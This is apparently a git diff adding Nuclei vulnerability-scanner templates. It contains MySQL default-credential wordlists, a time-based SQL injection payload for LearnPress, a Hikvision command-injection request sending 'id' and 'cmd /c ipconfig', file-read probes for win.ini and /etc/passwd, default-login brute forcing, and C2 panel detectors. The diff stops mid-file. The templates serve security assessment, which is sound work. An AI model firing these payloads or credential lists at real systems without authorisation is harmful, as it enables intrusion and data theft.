diff --git a/helpers/wordlists/mysql-passwords.txt b/helpers/wordlists/mysql-passwords.txt
new file mode 100644
index 0000000000..c514e405ad
--- /dev/null
+++ b/helpers/wordlists/mysql-passwords.txt
@@ -0,0 +1,19 @@
+mysql
+root
+chippc
+admin
+nagiosxi
+usbw
+cloudera
+moves
+testpw
+p@ck3tf3nc3
+medocheck123
+mktt
+123
+amp109
+eLaStIx.asteriskuser.2oo7
+raspberry
+openauditrootuserpassword
+vagrant
+123qweASD#
\ No newline at end of file
diff --git a/helpers/wordlists/mysql-users.txt b/helpers/wordlists/mysql-users.txt
new file mode 100644
index 0000000000..37e33b4a7e
--- /dev/null
+++ b/helpers/wordlists/mysql-users.txt
@@ -0,0 +1,7 @@
+root
+admin
+cloudera
+moves
+mcUser
+dbuser
+asteriskuser
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml
new file mode 100644
index 0000000000..cf5fc0bef7
--- /dev/null
+++ b/http/cves/2023/CVE-2023-6114.yaml
@@ -0,0 +1,37 @@
+id: CVE-2023-6114
+
+info:
+ name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
+ remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
+ reference:
+ - https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
+ - https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-6114
+ - https://wpscan.com/plugin/duplicator/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2023-6114
+ cwe-id: CWE-552
+ epss-score: 0.00145
+ epss-percentile: 0.50326
+ cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
+ tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
+ - "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code == 200"
+ - "contains(body, '/tmp') && contains(body, '
Index of')"
+ condition: and
diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml
new file mode 100644
index 0000000000..f9e5eaf434
--- /dev/null
+++ b/http/cves/2023/CVE-2023-6567.yaml
@@ -0,0 +1,33 @@
+id: CVE-2023-6567
+
+info:
+ name: LearnPress <= 4.2.5.7 - SQL Injection
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: critical
+ description: |
+ The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ remediation: Fixed in version 4.2.5.8
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
+ - https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-6567
+ classification:
+ cve-id: CVE-2023-6567
+ metadata:
+ max-request: 1
+ verified: true
+ publicwww-query: "/wp-content/plugins/learnpress"
+ tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'contains_all(header, "lp_session_guest=", "application/json")'
+ - 'contains_all(body, "status\":\"success", "No courses were found")'
+ condition: and
diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml
index b1fdac14f0..69da102528 100644
--- a/http/cves/2023/CVE-2023-6895.yaml
+++ b/http/cves/2023/CVE-2023-6895.yaml
@@ -1,24 +1,21 @@
id: CVE-2023-6895
info:
- name: Hikvision Intercom Broadcasting System - Command Execution
- author: archer
+ name: Hikvision IP ping.php - Command Execution
+ author: DhiyaneshDk,archer
severity: critical
description: |
- Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
+ A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
reference:
- - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- - https://github.com/Marco-zcl/POC
- - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
- epss-percentile: 0.32716
+ epss-percentile: 0.33389
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -26,31 +23,35 @@ info:
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
- tags: cve,cve2023,rce,hikvision
+ tags: cve,cve2023,hikvision,rce
http:
- - raw:
- - |
- POST /php/ping.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- X-Requested-With: XMLHttpRequest
+ - method: POST
+ path:
+ - "{{BaseURL}}/php/ping.php"
+ body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
+ headers:
+ Content-Type: "application/x-www-form-urlencoded"
- jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
+ payloads:
+ command:
+ - 'id'
+ - 'cmd /c ipconfig'
matchers-condition: and
matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "dns"
+ - type: regex
+ part: body
+ regex:
+ - "Windows IP"
+ - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+ condition: or
- type: word
- part: body
+ part: header
words:
- - "TTL="
+ - "text/html"
- type: status
status:
- 200
-# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/ispconfig-default-login.yaml b/http/default-logins/ispconfig-default-login.yaml
new file mode 100644
index 0000000000..e3cf05065c
--- /dev/null
+++ b/http/default-logins/ispconfig-default-login.yaml
@@ -0,0 +1,61 @@
+id: ispconfig-default-login
+
+info:
+ name: ISPConfig - Default Password
+ author: pussycat0x
+ severity: high
+ description: |
+ ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+ metadata:
+ verified: true
+ shodan-query: http.title:"ispconfig"
+ tags: default-login,ispconfig
+
+http:
+ - raw:
+ - |
+ GET /lgoin HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Origin: {{BaseURL}}
+ Connection: close
+ Referer: {{RootURL}}/login/
+
+ username={{username}}&password={{password}}&s_mod=login&s_pg=index
+
+ - |
+ GET /sites/web_vhost_domain_list.php HTTP/1.1
+ Host: {{Hostname}}
+ X-Requested-With: XMLHttpRequest
+ Referer: {{RootURL}}/index.php
+
+ attack: pitchfork
+ payloads:
+ username:
+ - 'admin'
+ - 'guest'
+ - 'root'
+ password:
+ - 'admin'
+ - 'password'
+ - 'toor'
+
+ stop-at-first-match: true
+ host-redirects: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_3
+ words:
+ - Tools
+ - Websites
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml
new file mode 100644
index 0000000000..60ae43df94
--- /dev/null
+++ b/http/exposed-panels/c2/ares-rat-c2.yaml
@@ -0,0 +1,33 @@
+id: ares-rat-c2
+
+info:
+ name: Area Rat C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Ares is a Python Remote Access Tool.
+ reference:
+ - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: product:'Ares RAT C2'
+ tags: c2,ir,osint,ares,panel,rat
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Ares'
+ - 'Passphrase:'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml
new file mode 100644
index 0000000000..d2e0c7a0cb
--- /dev/null
+++ b/http/exposed-panels/c2/caldera-c2.yaml
@@ -0,0 +1,32 @@
+id: caldera-c2
+
+info:
+ name: Caldera C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
+ reference:
+ - https://github.com/mitre/caldera
+ - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: http.favicon.hash:-636718605
+ tags: c2,ir,osint,caldera,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Login | CALDERA'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml
new file mode 100644
index 0000000000..e40038d588
--- /dev/null
+++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml
@@ -0,0 +1,31 @@
+id: hack5-cloud-c2
+
+info:
+ name: Hack5 Cloud C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
+ reference:
+ - https://twitter.com/fofabot/status/1742737671037091854
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: app="Hak5-C2"
+ tags: c2,ir,osint,hack5c2,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Hak5 Cloud C²'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml
new file mode 100644
index 0000000000..b4194d8f88
--- /dev/null
+++ b/http/exposed-panels/c2/pupyc2.yaml
@@ -0,0 +1,32 @@
+id: pupyc2
+
+info:
+ name: PupyC2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
+ reference:
+ - https://twitter.com/TLP_R3D/status/1654038602282565632
+ - https://github.com/n1nj4sec/pupy
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: aa3939fc357723135870d5036b12a67097b03309
+ tags: c2,ir,osint,pupyc2,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'Etag: "aa3939fc357723135870d5036b12a67097b03309"'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml
new file mode 100644
index 0000000000..131e9e2d39
--- /dev/null
+++ b/http/exposed-panels/c2/supershell-c2.yaml
@@ -0,0 +1,33 @@
+id: supershell-c2
+
+info:
+ name: Supershell C2 - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload.
+ reference:
+ - https://twitter.com/S4nsLimit3/status/1693619836339859497
+ - https://github.com/tdragon6/Supershell/blob/main/README_EN.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="-1010228102"
+ tags: c2,ir,osint,supershell,panel
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ host-redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Supershell - 登录'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml
new file mode 100644
index 0000000000..5d92c138af
--- /dev/null
+++ b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml
@@ -0,0 +1,36 @@
+id: esafenet-mysql-fileread
+
+info:
+ name: Esafenet CDG mysql - File Read
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ CDGServer3 Unauthorized File Download vulnerability is detected.
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="电子文档安全管理系统"
+ tags: esafenet,lfi,mysql
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "varchar"
+ - "create table"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/x-sql"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml
new file mode 100644
index 0000000000..28fdcefb12
--- /dev/null
+++ b/http/vulnerabilities/idoc/idocview-2word-fileupload.yaml
@@ -0,0 +1,30 @@
+id: idocview-2word-fileupload
+
+info:
+ name: IDoc View /html/2word - Arbitrary File Upload
+ author: DhiyaneshDK
+ severity: high
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title=="在线文档预览 - I Doc View"
+ tags: idoc,rce,instrusive,file-upload
+
+variables:
+ file: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/html/2word?url={{file}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: response
+ words:
+ - "{{md5(file)}}.docx"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/idoc/idocview-lfi.yaml b/http/vulnerabilities/idoc/idocview-lfi.yaml
new file mode 100644
index 0000000000..12ac44a85d
--- /dev/null
+++ b/http/vulnerabilities/idoc/idocview-lfi.yaml
@@ -0,0 +1,37 @@
+id: idocview-lfi
+
+info:
+ name: IDoc View - Arbitrary File Read
+ author: DhiyaneshDK
+ severity: high
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title=="在线文档预览 - I Doc View"
+ tags: idoc,lfi,file-read
+
+variables:
+ file: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+
+ - method: GET
+ path:
+ - "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code == 200
+ - contains(content_type, 'application/json')
+ - contains_all(body, "ext", "srcUrl", "success", "md5")
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: filepath
+ group: 1
+ regex:
+ - '"srcUrl":"\/([a-z/0-9_.]+)"'
diff --git a/http/vulnerabilities/other/office365-indexs-fileread.yaml b/http/vulnerabilities/other/office365-indexs-fileread.yaml
new file mode 100644
index 0000000000..ebb3013d26
--- /dev/null
+++ b/http/vulnerabilities/other/office365-indexs-fileread.yaml
@@ -0,0 +1,36 @@
+id: office365-indexs-fileread
+
+info:
+ name: OfficeWeb365 Indexs Interface - Arbitary File Read
+ author: DhiyaneshDK
+ severity: high
+ description: |
+ There is any file reading in the officeWeb365 Indexs interface.
+ reference:
+ - https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: "OfficeWeb365"
+ tags: officeweb365,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "for 16-bit app support"
+
+ - type: word
+ part: body
+ words:
+ - "image/png"
+
+ - type: status
+ status:
+ - 200
diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml
new file mode 100644
index 0000000000..cede045998
--- /dev/null
+++ b/javascript/audit/mysql/mysql-load-file.yaml
@@ -0,0 +1,57 @@
+id: mysql-load-file
+info:
+ name: MySQL LOAD_FILE - Enable
+ author: pussycat0x
+ severity: high
+ description: |
+ The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-databases.html
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,network,audit
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ Query: SELECT LOAD_FILE('/etc/passwd')
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - success == true
+
+ - type: word
+ words:
+ - "root:x:"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - .Rows[]
\ No newline at end of file
diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml
new file mode 100644
index 0000000000..f5b5535048
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-default-login.yaml
@@ -0,0 +1,50 @@
+id: mysql-default-login
+
+info:
+ name: MySQL - Default Login
+ author: DhiyaneshDk,pussycat0x,ritikchaddha
+ severity: high
+ description: |
+ A MySQL service was accessed with easily guessed credentials.
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,default-login,network,fuzz
+
+javascript:
+ - pre-condition: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.IsMySQL(Host, Port);
+
+ code: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.Connect(Host,Port,Username,Password)
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ -
+ attack: clusterbomb
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "response == true"
+ - "success == true"
+ condition: and
diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml
new file mode 100644
index 0000000000..5d90a8a098
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-info.yaml
@@ -0,0 +1,36 @@
+id: mysql-info
+
+info:
+ name: MySQL Info - Enumeration
+ author: pussycat0x
+ severity: info
+ description: |
+ Connects to a MySQL server and prints information such as the protocol and version numbers
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-info.html
+ metadata:
+ shodan-query: port:3306
+ tags: js,mssql,network
+
+javascript:
+ - code: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ var response = c.FingerprintMySQL(Host,Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ json:
+ - '"Version: "+ .Version '
+ - '"TLS "+ .TLS'
+ - '"Transport: "+ .Transport '
\ No newline at end of file
diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml
new file mode 100644
index 0000000000..b18a97008a
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-show-databases.yaml
@@ -0,0 +1,51 @@
+id: mysql-show-databases
+
+info:
+ name: MySQL - Show Databases
+ author: DhiyaneshDk
+ severity: high
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-databases.html
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,network,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ Query: "show databases;"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - .Rows[] | .Database
\ No newline at end of file
diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml
new file mode 100644
index 0000000000..727d251ba8
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-show-variables.yaml
@@ -0,0 +1,51 @@
+id: mysql-show-variables
+
+info:
+ name: MySQL - Show Variables
+ author: DhiyaneshDk
+ severity: high
+ description: Attempts to show all variables on a MySQL server.
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-variables.html
+ metadata:
+ shodan-query: port:3306
+ tags: js,mysql,network,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+ Query: "show variables;"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - '.Rows[].Variable_name'
\ No newline at end of file
diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml
new file mode 100644
index 0000000000..afc2f3b26c
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-user-enum.yaml
@@ -0,0 +1,53 @@
+id: mysql-user-enum
+
+info:
+ name: MySQL - User Enumeration
+ author: pussycat0x
+ severity: high
+ description: |
+ Attempts to list all users on a MySQL server.
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-users.html
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,network,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ Query: "SELECT DISTINCT user FROM mysql.user;"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - '.Rows[].user'
\ No newline at end of file
diff --git a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml
new file mode 100644
index 0000000000..aa3ee91fee
--- /dev/null
+++ b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml
@@ -0,0 +1,40 @@
+id: pop3-capabilities-enum
+
+info:
+ name: POP3 Capabilities - Enumeration
+ author: pussycat0x
+ severity: info
+ description: |
+ POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available.
+ reference:
+ - https://nmap.org/nsedoc/scripts/pop3-capabilities.html
+ metadata:
+ max-request: 1
+ shodan-query: "port:110"
+ verified: true
+ tags: js,network,pop3,enum
+
+javascript:
+ - code: |
+ let data = "CAPA\r\n"
+ let c = require("nuclei/net");
+ let conn = c.Open('tcp', `${Host}:${Port}`);
+ conn.Send(data);
+ let result = conn.RecvString();
+ let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " ");
+ Export(cleanedData)
+
+ args:
+ Host: "{{Host}}"
+ Port: 110
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: dsl
+ name:
+ dsl:
+ - response
diff --git a/javascript/enumeration/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml
new file mode 100644
index 0000000000..4a228a1a74
--- /dev/null
+++ b/javascript/enumeration/redis/redis-info.yaml
@@ -0,0 +1,39 @@
+id: redis-info
+
+info:
+ name: Redis Info - Detect
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ Retrieves information (such as version number and architecture) from a Redis key-value store.
+ reference:
+ - https://nmap.org/nsedoc/scripts/redis-info.html
+ metadata:
+ max-request: 1
+ shodan-query: product:"redis"
+ tags: js,redis,network
+
+javascript:
+ - code: |
+ const redis = require('nuclei/redis');
+ const info = redis.GetServerInfo(Host,Port);
+ Export(info);
+
+ args:
+ Host: "{{Host}}"
+ Port: "6379"
+
+ extractors:
+ - type: regex
+ part: response
+ regex:
+ - redis_version:(\d+\.\d+\.\d+)
+ - os:(.*?)\\r\\n
+ - arch_bits:(\d+)\s+bits
+ - process_id:(\d+)
+ - used_cpu_sys:(\d+\.\d+)
+ - used_cpu_user:(\d+\.\d+)
+ - connected_clients:(\d+)
+ - connected_slaves:(\d+)
+ - used_memory_human:(\d+\.\d+[KMGTPEZY]?)
+ - role:(\w+)
diff --git a/javascript/enumeration/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml
new file mode 100644
index 0000000000..d87e34fc94
--- /dev/null
+++ b/javascript/enumeration/redis/redis-require-auth.yaml
@@ -0,0 +1,29 @@
+id: redis-require-auth
+
+info:
+ name: Redis Require Authentication - Detect
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ IsAuthenticated checks if the redis server requires authentication
+ reference:
+ - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated
+ metadata:
+ max-request: 1
+ shodan-query: product:"redis"
+ tags: js,redis,network
+
+javascript:
+ - code: |
+ const redis = require('nuclei/redis');
+ const isAuthenticated = redis.IsAuthenticated(Host,Port);
+ Export(isAuthenticated);
+
+ args:
+ Host: "{{Host}}"
+ Port: "6379"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
diff --git a/javascript/enumeration/rsync/rsync-version.yaml b/javascript/enumeration/rsync/rsync-version.yaml
new file mode 100644
index 0000000000..e000224e17
--- /dev/null
+++ b/javascript/enumeration/rsync/rsync-version.yaml
@@ -0,0 +1,29 @@
+id: rsync-version
+
+info:
+ name: Rsync Version - Detect
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ Identify the Version of the Rsync Protocol
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: port:"873"
+ tags: js,network,rsync,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/rsync');
+ let c = m.RsyncClient();
+ let response = c.IsRsync(Host,Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "873"
+
+ extractors:
+ - type: json
+ json:
+ - .Banner
diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml
new file mode 100644
index 0000000000..325a599d14
--- /dev/null
